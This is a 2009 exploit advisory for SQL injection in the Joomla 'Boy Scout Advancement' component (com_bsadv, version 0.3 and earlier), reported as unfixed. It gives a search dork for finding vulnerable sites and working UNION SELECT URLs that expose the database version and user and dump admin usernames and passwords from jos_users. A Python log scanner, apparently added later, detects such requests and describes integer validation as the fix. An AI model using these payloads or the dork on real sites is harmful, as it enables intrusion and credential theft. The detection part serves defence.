SECURITYVULNS:DOC:21874 (securityvulns)
May 25, 2009

MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)-->


CMS INFORMATION:

-->WEB: http://bsadv.sourceforge.net/
-->DOWNLOAD: http://bsadv.sourceforge.net/
-->DEMO: N/A
-->CATEGORY: Joomla/Component
-->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and advancement
data for Boy Scout Troops in the United States…
-->RELEASED: 2009-02-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK --> inurl:"?option=com_bsadv"
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: <= 0.3
-->Discovered Bug date: 2009-05-25
-->Reported Bug date: 2009-05-25
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose… brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)

############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON ++++++++++++++++--------->>>>


PROOFS OF CONCEPT:

[++] GET var --> 'id'

http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23


[++] GET var --> 'id'


~~~~~>
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57



[++[Return]++] ~~~~~> User, version or database.



-----------
EXPLOITS:
-----------



~~~~~>
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23



[++[Return]++] ~~~~~> Username:::password id=62



~~~~~>
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57



[++[Return]++] ~~~~~> Username and password id=62
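
A defender-side check for the requests shown above, as an added example that is not part of the original advisory or the component's code: it scans web-server access logs for com_bsadv requests whose 'id' parameter is not a plain decimal integer. The log lines are constructed, the function names are hypothetical, and it assumes combined-format logs and that legitimate ids are non-negative integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format log lines; IPs, paths and timestamps are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/May/2009:10:01:02 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/May/2009:10:03:40 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23 HTTP/1.1" 200 4873',
    '198.51.100.9 - - [25/May/2009:10:04:11 +0000] "GET /index.php?option=com_bsadv&controller=peruse&task=account&id=-1%20union%20all%20select%20database(),version()%23&Itemid=57 HTTP/1.1" 200 4410',
    '198.51.100.7 - - [25/May/2009:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=5:about HTTP/1.1" 200 9001',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def is_plain_id(value):
    # Assumption: the component only ever needs a non-negative decimal id.
    # The advisory's payloads contain no quote characters, which is why the
    # magic quotes setting does not matter; a strict integer check does.
    return re.fullmatch(r'[0-9]{1,10}', value) is not None

def suspicious_bsadv_requests(lines):
    """Return (client_ip, task, id_value) for com_bsadv requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes and turns '+' into a space, so encoded
        # variants (%20, +) are checked in decoded form.
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if query.get('option', [''])[-1] != 'com_bsadv':
            continue  # other components legitimately use ids such as "5:about"
        task = query.get('task', [''])[-1]
        for value in query.get('id', []):
            if not is_plain_id(value):
                hits.append((line.split()[0], task, value))
    return hits

if __name__ == '__main__':
    for ip, task, value in suspicious_bsadv_requests(SAMPLE_LOG):
        print(f'{ip} task={task} id={value!r}')
```

The same integer-only rule, enforced on 'id' before it reaches the query, is the server-side fix for both affected tasks.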



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################